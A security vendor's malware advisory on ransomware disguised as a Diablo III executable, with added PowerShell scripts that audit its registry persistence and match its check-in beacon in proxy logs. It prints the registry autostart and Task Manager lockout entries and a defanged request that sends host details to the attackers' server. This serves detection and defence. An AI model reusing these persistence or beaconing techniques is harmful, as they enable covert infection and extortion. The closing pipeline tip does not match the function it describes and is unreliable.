
6/11/2012

[Caution] Ransomware disguised as a Diablo 3 file

1. Introduction

The INCA Internet response team detected ransomware disguised as a Diablo 3 related file. Ransomware restricts access to the computer system it infects and demands a ransom paid to the creator of the malware in order for the restriction to be removed. It typically propagates like a conventional computer worm, entering a system through, for example, a vulnerability in a network service or a downloaded file. The program then runs a payload that begins to encrypt personal files on the hard drive.



Ransomware:

Ransomware (also referred to in some cases as cryptoviruses, cryptotrojans or cryptoworms) comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed.

2. Malicious file info

Diablo III is a dark fantasy/horror-themed action game by Blizzard Entertainment. Before its release, the game broke several presale records and became the most pre-ordered PC game of all time on Amazon.com. Given the popularity of this game, attackers are using it as a lure to spread malicious files.


The name of this malicious file is "Diablo_III.exe", the same as the real Diablo file name. It copies itself into the Application Data folder.


When the malicious file is executed, it modifies the registry so that it runs again after reboot and blocks Windows Task Manager from opening. It also changes the desktop background image and interferes with normal use.

HKLM\Software\Microsoft\Active Setup\Installed Components\{Gusfa7ep-lUCJ-Ed2r-Yvs8-fYwL6tnW7CxX}\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe /ActiveX
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr: "1"
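The following read-only audit script is an added example and not part of the original post or INCA Internet's tools. It checks the persistence locations listed above: Winlogon Shell/Userinit values that differ from the Windows defaults, Run and Active Setup entries that launch from AppData, and the DisableTaskMgr policy. The default Userinit value it compares against is assumed to be "%WinDir%\System32\userinit.exe,".

```powershell
# Added example (not from the original post): audit the persistence points this
# sample abuses. Read-only; run from an elevated PowerShell so HKLM is readable.
# Legitimate per-user software also starts from AppData, so review each finding.
$findings = @()

# Winlogon defaults assumed: Shell = explorer.exe, Userinit = <System32>\userinit.exe,
$defaultUserinit = "$env:WinDir\System32\userinit.exe,"
foreach ($hive in 'HKLM', 'HKCU') {
    $key = "${hive}:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
    if (-not (Test-Path $key)) { continue }
    $p = Get-ItemProperty -Path $key
    if ($p.Shell -and $p.Shell -ne 'explorer.exe') { $findings += "$key\Shell = $($p.Shell)" }
    if ($p.Userinit -and $p.Userinit -ne $defaultUserinit) { $findings += "$key\Userinit = $($p.Userinit)" }
}

# Run keys: any value whose command line lives under AppData (expanded or as %Appdata%)
foreach ($hive in 'HKLM', 'HKCU') {
    $key = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Run"
    if (-not (Test-Path $key)) { continue }
    foreach ($v in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($v.Name -like 'PS*') { continue }      # skip PowerShell's PS* metadata properties
        if ("$($v.Value)" -match 'AppData') { $findings += "$key\$($v.Name) = $($v.Value)" }
    }
}

# Active Setup Installed Components: inspect every value of every component subkey,
# since the sample uses a random value name rather than the usual StubPath
$asKey = 'HKLM:\Software\Microsoft\Active Setup\Installed Components'
foreach ($sub in (Get-ChildItem -Path $asKey -ErrorAction SilentlyContinue)) {
    foreach ($v in (Get-ItemProperty -Path $sub.PSPath).PSObject.Properties) {
        if ($v.Name -like 'PS*') { continue }
        if ("$($v.Value)" -match 'AppData') { $findings += "$($sub.Name)\$($v.Name) = $($v.Value)" }
    }
}

# Task Manager lockout policy set by the sample
$pol = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
if (Test-Path $pol) {
    $d = (Get-ItemProperty -Path $pol).DisableTaskMgr
    if ("$d" -eq '1') { $findings += "$pol\DisableTaskMgr = $d" }
}

if ($findings.Count -eq 0) { Write-Output 'No suspicious persistence entries found.' }
else { $findings | ForEach-Object { Write-Warning $_ } }
```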

Furthermore, it reads the PC's name and OS version name, which appear in the following request it sends to a remote server:

hxxp://galbbza.com/partner2/universalpanel/gate.php?hwid=4281525696&pc=COMPUTERNAME&localip=192.168.0.1&winver=Windows XP Professional x32
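A matching network-side check, added here as an example and not part of the original post: it scans proxy log lines for the check-in request shape shown above (gate.php with hwid, pc, localip and winver parameters). The log lines are constructed for the example; the domain in the first line is the one the post reports, but the match is on the query shape, so a moved gate on another host is still flagged.

```powershell
# Added example (not from the original post): find the sample's check-in requests
# in web proxy logs by query shape, not by domain, and pull out the reported fields.
$beaconPattern = 'https?://(?<host>[\w.-]+)[^\s?]*/gate\.php\?hwid=(?<hwid>\d+)&pc=(?<pc>[^&\s]+)&localip=(?<ip>[\d.]+)&winver=(?<winver>[^&\s]+)'

function Find-GateBeacons {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match $beaconPattern) {
            [pscustomobject]@{
                Host    = $Matches.host
                HwId    = $Matches.hwid
                Pc      = $Matches.pc
                LocalIp = $Matches.ip
                WinVer  = [uri]::UnescapeDataString($Matches.winver)   # undo %20 in the OS name
                Line    = $line
            }
        }
    }
}

# Constructed sample log lines (timestamp, client, method, URL, status);
# a real proxy URL-encodes the spaces in the winver parameter as %20.
$sampleLog = @(
    '2012-06-11 09:14:02 10.0.0.15 GET http://galbbza.com/partner2/universalpanel/gate.php?hwid=4281525696&pc=WS-ACCT-07&localip=192.168.0.1&winver=Windows%20XP%20Professional%20x32 200',
    '2012-06-11 09:14:03 10.0.0.15 GET http://www.gvu.de/index.php?id=39 200',
    '2012-06-11 09:15:11 10.0.0.22 GET http://example.com/gate.php?id=1 200'
)

# Only the first line matches; the second is the lure page, the third a different gate.php
Find-GateBeacons -Lines $sampleLog | Format-Table Host, Pc, LocalIp, WinVer -AutoSize
```

Feed real log files with `Get-Content proxy.log | Find-GateBeacons -Lines $_`-style piping or by passing the file contents as `-Lines`; the reported pc and localip values identify the infected host for follow-up.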

The following figure shows a lock screen disguised as the GVU, the Gesellschaft zur Verfolgung von Urheberrechtsverletzungen (a German association that investigates software, music, and motion picture copyright infringement), and its official web site:

http://www.gvu.de/index.php?id=39



Once the malicious file runs, the following screen is shown. All input devices are blocked except the field for entering a code. To get the code, victims are told to pay 50 EURO.


Various types of ransomware have been spread. The most popular technique is to pose as a message from the police or a public institution. It claims that the victim's PC was infected with malware and used for illegal activity, and that the user must pay within 24 hours, otherwise all data on the HDD will be formatted.

The following figure shows a ransomware page.


3. Summary

These malicious files have been spread via hacked overseas web sites and use exploits for MS OS/Office, Adobe Flash Player/Reader, and Java. To keep your PC safe from these threats, we recommend that you install the latest security updates and follow the "Security management tips" for general users below.

Security management tips

1. Keep the OS and applications on the latest security updates.
2. Use anti-virus software from a trustworthy security company, keep its engine updated, and keep the real-time detection function ON.
3. Do not open or download attachments from suspicious e-mails.
4. Be cautious with links received via instant messengers and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.
